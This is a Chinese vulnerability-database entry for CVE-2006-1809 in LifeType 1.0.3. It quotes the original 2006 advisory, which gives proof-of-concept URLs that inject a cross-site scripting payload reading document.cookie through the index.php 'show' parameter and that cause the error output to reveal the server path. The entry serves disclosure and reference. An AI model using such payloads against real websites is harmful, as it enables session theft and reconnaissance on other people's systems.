Lifetype index.php 信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1195346 漏洞类型 未知
发布时间 2006-04-18 更新时间 2006-04-18
CVE编号 CVE-2006-1809 CNNVD-ID CNNVD-200604-284
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/87705
https://cxsecurity.com/issue/WLB-2006040043
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-284
|漏洞详情
Lifetype1.0.3中的index.php允许远程攻击者借助于无效的显示参数获取敏感信息。该漏洞在错误信息中泄露了路径信息。
|漏洞EXP
 k  k         kkkk kk   kkkk  k  k  kkkkkk kkkkkk    kkkk   k    k   k   k  k
 k k         k   k  k  k   k  k k     kk   k     k  k    k  kk   k   k   k k
 kk   <><>   kkkkk  k  kkkkk  kk      kk   kkkkkk   k    k  k k  k   k   kk
 k k         k      k  k      k k     kk   k   k    k    k  k  k k   k   k k
 k  k         kkkk  kk  kkkk  k  k    kk   k    k    kkkk   k   kk   k   k  k

]=- Vulnerabilities in Lifetype

Author   : Rusydi Hasan M
 a.k.a    : cR45H3R
 Date     : April,13th 2006
 Location : Indonesia, Cilacap

]=- Software description

A CMS to manage a blog

Link    : http://www.lifetype.net
 Version : 1.0.3
 Author  : Oscar Renalias

]=- The bug

XSS a.k.a Cross Site Scripting + Full path disclosures

]=- [P]roof [O]f [C]oncept

http://[victim]/[lifetype_dir]/index.php?op=Template&blogId=1&show=[XSS_
here]

E[x]ample :

http://127.0.0.1/lifetype/index.php?op=Template&blogId=1&show=%3Cscript%
3Ealert(document.cookie)%3C/script%3E

http://127.0.0.1/lifetype/index.php?op=Template&blogId=1&show=%3Ch1%3EJu
st%20Test%20your%20URL%3C/h1%3E

and after that, you will see location of the root directory such as
/var/www/html/.

]=- Vendor

%00

]=- Shoutz

# fwerd,chiko,cbug,ladybug,litherr,cybertank,cyb3rh3b,cahcephoe,scut,degle
ng,etc
# y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous, the
day
# ph03n1x,ghoz,spyoff,slackX,r34d3r,xnuxer,sakitjiwa,m_beben

]=- Contact

crasher (at) kecoak.or (dot) id [email concealed] || http://kecoak.or.id
|受影响的产品
LifeType LifeType 1.0.3
|参考资料

来源:BUGTRAQ
名称:20060414Vulnerabilitiesinlifetype
链接:http://www.securityfocus.com/archive/1/archive/1/431008/100/0/threaded
来源:SECTRACK
名称:1015941
链接:http://securitytracker.com/id?1015941
来源:XF
名称:lifetype-index-path-disclosure(25903)
链接:http://xforce.iss.net/xforce/xfdb/25903
来源:SREASON
名称:711
链接:http://securityreason.com/securityalert/711